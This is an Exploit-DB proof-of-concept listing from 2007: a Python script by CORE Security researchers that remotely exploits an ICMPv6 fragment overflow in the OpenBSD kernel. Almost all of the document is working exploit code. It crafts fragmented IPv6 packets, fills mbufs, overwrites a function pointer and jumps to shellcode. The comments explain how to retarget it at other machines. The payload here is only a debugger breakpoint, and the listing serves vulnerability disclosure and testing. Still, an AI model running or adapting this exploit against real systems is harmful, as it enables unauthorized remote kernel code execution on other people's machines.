OpenBSD - ICMPv6 Fragment Remote Execution

EDB-ID:

3491

CVE:

N/A


Platform:

BSD

Published:

2007-03-15

# The PoC executes the shellcode (int 3) and returns. It overwrites the 
# ext_free() function pointer on the mbuf and forces a m_freem() on the 
# overflowed packet. 
#
# The Impacket library is used to craft and send packets 
# (http://oss.coresecurity.com/projects/impacket.html or download from 
# Debian repositories) 
#
# Currently, only systems supporting raw sockets and the PF_PACKET family 
# can run the included proof-of-concept code. 
#
# Tested against a system running "OpenBSD 4.0 CURRENT (GENERIC) Mon Oct 
# 30" 
#
# To use the code to test a custom machine you will need to: 1) Adjust the 
# MACADDRESS variable 2) Find the right trampoline value for your system 
# and replace it in the code. To find a proper trampoline value use the 
# following command: "objdump -d /bsd | grep esi | grep jmp" 3) Adjust the 
# ICMP checksum 
#
# The exploit should stop on an int 3 and pressing "c" in ddb the kernel 
# will continue normally. 
#
#
# Description:
#   OpenBSD ICMPv6 fragment remote execution PoC
#
# Author:
#   Alfredo Ortega
#   Mario Vilas
#
# Copyright (c) 2001-2007 CORE Security Technologies, CORE SDI Inc.
# All rights reserved

from impacket import ImpactPacket
import struct
import socket
import time

class BSD_ICMPv6_Remote_BO:
    MACADDRESS = (0x00,0x0c,0x29,0x44,0x68,0x6f)
    def Run(self):
        self.s = socket.socket(socket.PF_PACKET, socket.SOCK_RAW)
        self.s.bind(('eth0',0x86dd))
        sourceIP = '\xfe\x80\x00\x00\x00\x00\x00\x00\x02\x0f\x29\xff\xfe\x44\x68\x6f'  # source address
        destIP   = '\xff\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01'  # destination address Multicast Link-level 
        firstFragment, secondFragment = self.buildOpenBSDPackets(sourceIP,destIP)
	validIcmp = self.buildValidICMPPacket(sourceIP,destIP)
	
	for i in range(100): # fill mbufs
        	self.sendpacket(firstFragment)
		self.sendpacket(validIcmp)
		time.sleep(0.01)
	for i in range(2): # Number of overflow packets to send. Increase if exploit is not reliable
        	self.sendpacket(secondFragment)
		time.sleep(0.1)
        	self.sendpacket(firstFragment)
		self.sendpacket(validIcmp)
		time.sleep(0.1)

    def sendpacket(self, data):
        ipe = ImpactPacket.Ethernet()
        ipe.set_ether_dhost(self.MACADDRESS)
        ipd = ImpactPacket.Data(data)
        ipd.ethertype = 0x86dd  # Ethertype for IPv6
        ipe.contains(ipd)
        p = ipe.get_packet()
        self.s.send(p)

    def buildOpenBSDPackets(self,sourceIP,destIP):
        HopByHopLenght= 1

        IPv6FragmentationHeader = ''
        IPv6FragmentationHeader += struct.pack('!B', 0x3a)  # next header (00: Hop by Hop)
        IPv6FragmentationHeader += struct.pack('!B', 0x00)  # reserverd
        IPv6FragmentationHeader += struct.pack('!B', 0x00)  # offset
        IPv6FragmentationHeader += struct.pack('!B', 0x01)  # offset + More fragments: yes
        IPv6FragmentationHeader += struct.pack('>L', 0x0EADBABE) # id

        IPv6HopByHopHeader  = ''
        IPv6HopByHopHeader += struct.pack('!B', 0x2c)                    # next header (0x3A: ICMP)
        IPv6HopByHopHeader += struct.pack('!B', HopByHopLenght )         # Hdr Ext Len (frutaaaaaaa :D )
        IPv6HopByHopHeader += '\x00' *(((HopByHopLenght+1)*8)-2)         # Options

        longitud = len(IPv6HopByHopHeader)+len(IPv6FragmentationHeader)
	print longitud
        IPv6Packet  = ''
        IPv6Packet += struct.pack( '>L', 6 << 28 )      # version, traffic class, flow label
        IPv6Packet += struct.pack( '>H', longitud )     # payload length
        IPv6Packet += '\x00'                            # next header (2c: Fragmentation)
        IPv6Packet += '\x40'                            # hop limit

        IPv6Packet += sourceIP
        IPv6Packet += destIP

        firstFragment = IPv6Packet+IPv6HopByHopHeader+IPv6FragmentationHeader+('O'*150)

	self.ShellCode =  ''
        self.ShellCode += '\xcc' # int 3
	self.ShellCode += '\x83\xc4\x20\x5b\x5e\x5f\xc9\xc3\xcc' #fix ESP and ret

        ICMPv6Packet  = ''
        ICMPv6Packet += '\x80'  # type (128 == Icmp echo request)
        ICMPv6Packet += '\x00'  # code
        ICMPv6Packet += '\xfb\x4e'  # checksum
        ICMPv6Packet += '\x33\xf6'  # ID
        ICMPv6Packet += '\x00\x00'  # sequence
        ICMPv6Packet +=  ('\x90'*(212-len(self.ShellCode)))+self.ShellCode
	# Start of the next mfub (we land here):
	ICMPv6Packet += '\x90\x90\x90\x90\xE9\x3B\xFF\xFF' # jump backwards
        ICMPv6Packet += '\xFFAAA\x01\x01\x01\x01AAAABBBBAAAABBBB' 
	# mbuf+0x20:
	trampoline = '\x8c\x23\x20\xd0' # jmp ESI on /bsd (find with "objdump -d /bsd | grep esi | grep jmp")
        ICMPv6Packet += 'AAAAAAAA'+trampoline+'CCCCDDDDEEEEFFFFGGGG' 
        longitud = len(ICMPv6Packet)


	IPv6Packet  = ''
        IPv6Packet += struct.pack( '>L', 6 << 28 )      # version, traffic class, flow label
        IPv6Packet += struct.pack( '>H', longitud )     # payload length
        IPv6Packet += '\x2c'                            # next header (2c: Fragmentation)
        IPv6Packet += '\x40'                            # hop limit
        IPv6Packet += sourceIP
        IPv6Packet += destIP

        IPv6FragmentationHeader = ''
        IPv6FragmentationHeader += struct.pack('!B', 0x3a)  # next header (3A: icmpV6)
        IPv6FragmentationHeader += struct.pack('!B', 0x00)  # reserverd
        IPv6FragmentationHeader += struct.pack('!B', 0x00)  # offset
        IPv6FragmentationHeader += struct.pack('!B', 0x00)  # offset + More fragments:no
        IPv6FragmentationHeader += struct.pack('>L', 0x0EADBABE) # id

        secondFragment = IPv6Packet+IPv6FragmentationHeader+ICMPv6Packet

        return firstFragment, secondFragment



    def buildValidICMPPacket(self,sourceIP,destIP):

        ICMPv6Packet  = ''
        ICMPv6Packet += '\x80'  # type (128 == Icmp echo request)
        ICMPv6Packet += '\x00'  # code
        ICMPv6Packet += '\xcb\xc4'  # checksum
        ICMPv6Packet += '\x33\xf6'  # ID
        ICMPv6Packet += '\x00\x00'  # sequence
	ICMPv6Packet += 'T'*1232

        longitud = len(ICMPv6Packet)

        IPv6Packet  = ''
        IPv6Packet += struct.pack( '>L', 6 << 28 )      # version, traffic class, flow label
        IPv6Packet += struct.pack( '>H', longitud )     # payload length
        IPv6Packet += '\x3A'                            # next header (2c: Fragmentation)
        IPv6Packet += '\x40'                            # hop limit
        IPv6Packet += sourceIP
        IPv6Packet += destIP

        icmpPacket = IPv6Packet+ICMPv6Packet

        return  icmpPacket

attack = BSD_ICMPv6_Remote_BO()
attack.Run()

# milw0rm.com [2007-03-15]